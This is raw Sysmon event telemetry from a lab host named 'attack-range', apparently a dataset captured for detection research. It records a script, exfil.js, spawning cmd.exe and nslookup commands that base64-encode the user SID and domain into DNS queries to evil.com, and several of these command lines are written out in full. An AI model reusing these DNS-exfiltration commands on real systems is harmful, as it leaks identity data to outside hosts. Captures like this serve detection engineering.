C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-9745-000000005F02}6576C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcdedx.tmp 2>&1 10341000x8000000000000000213731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.761{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9845-000000005F02}2652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.761{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9845-000000005F02}2652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.745{2E1864BB-18F9-629A-9845-000000005F02}26527656C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9745-000000005F02}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.745{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9845-000000005F02}2652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9745-000000005F02}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-18E0-629A-6742-000000005F02}39762056C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-9745-000000005F02}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.741{2E1864BB-18F9-629A-9745-000000005F02}6576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcdedx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.729{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhnrpui.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.714{2E1864BB-18F9-629A-9545-000000005F02}40126556C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9645-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9645-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.698{2E1864BB-18F9-629A-9445-000000005F02}32888140C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-9645-000000005F02}4552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.711{2E1864BB-18F9-629A-9645-000000005F02}4552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-9445-000000005F02}3288C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhnrpui.tmp 2>&1 10341000x8000000000000000213711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.676{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9545-000000005F02}4012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.676{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9545-000000005F02}4012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.676{2E1864BB-18F9-629A-9545-000000005F02}40126556C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9445-000000005F02}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9545-000000005F02}4012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9445-000000005F02}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-18E0-629A-6742-000000005F02}39766172C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-9445-000000005F02}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.666{2E1864BB-18F9-629A-9445-000000005F02}3288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhnrpui.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 